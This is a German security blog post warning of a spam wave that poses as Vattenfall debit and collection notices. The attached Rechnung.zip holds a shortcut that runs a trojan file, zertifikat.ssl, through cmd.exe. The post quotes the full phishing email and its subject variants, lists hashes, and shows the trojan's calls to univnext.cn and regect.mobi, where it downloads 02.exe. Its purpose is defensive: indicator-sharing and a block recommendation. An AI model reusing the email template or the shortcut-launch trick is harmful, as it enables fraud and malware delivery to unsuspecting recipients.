Tag Archive for 'regect.mobi'

zertifikat.ssl – Emold?

Seit heute Nacht kurz nach 00:00 Uhr verbreitet sich ein noch unidentifizierter Trojaner (Emold?) über ein Spam-Welle:

Betreff: Lastschrift
Guten Tag!
Ihr Abbuchungsauftrag Nr.06660022 wurde erfullt.
Ein Betrag von 760.52 EURO wurde abgebucht und wird in Ihrem Bankauszug als “Vattenfallabbuchung ” angezeigt.
Die Auflistung der Kosten finden Sie im Anhang in der Datei: Rechnung.

Alle unsere Rechnungen sind mit einem Sicherheitszertifikat versehen – der ist fuer Sie nicht von Bedeutung

Vattenfall Europe AG
Chausseestra?e 23
10115 Berlin

Vertretungsberechtigter: Karl Treumeier
Umsatzsteuerident-Nummer: DR123052388
Handelsregisternummer HRB 74215B

Der Betreff variiert:

  • Lastschrift
  • Inkasso
  • Ratenzahlung
  • Abbuchung erfolgt
  • Abbuchung
  • Amtsgerticht
  • Amtsgericht Koeln
  • Forderungsmanagement GmbH
  • 1 Rate
  • Der EURO Betrag sowie die Anzahlungs Nr. variieren ebenfalls. Im Attachement Rechnung.zip befinden sich zwei Dateien:

    Rechnung.txt
    zertifikat.ssl

    Bei der Datei Rechnung.txt handelt es sich bloss um eine Verknüpfung auf die Datei zertifikat.ssl, welche den eigentlichen Trojaner beinhaltet. Die Datei wird über die Verknüpfung mittels cmd.exe ausgeführt:

    %windir%\system32\cmd.exe /c zertifikat.ssl
    Filename: zertifikat.ssl
    MD5: 57127815d6864a495151e49c7bf7d192
    SHA1: 43a8e686d45c636f1260651ff29abb1a399d3933
    Erkenungsrate: 5/36 (13.89%)

    Nach der Infizierung nimmt der Trojaner Kontakt mit der Domain univnext.cn (218.93.202.102) auf:

    GET http://univnext.cn/ld.php

    Das Attachement sollte auf keinen Fall geöffnet werden. Des Weiteren gilt es, die Domains zu blockeiren:

  • univnext.cn
  • regect.mobi
  • UPDATE 10:44 Uhr

    Der Trojaner scheint noch weiteren Schadcode nach zu laden:

    GET http://regect.mobi/02.exe

    Filename: 02.exe
    File size: 45297 bytes
    MD5…: b8750fa07487b47dc6e1ae54347ddbcb
    SHA1..: 9c584d8cadc7fa47e2d2f647c3310571fe72816d
    Erkennungsrate: 8/36 (22.23%)




    economics-recluse
    Scene
    Urgent!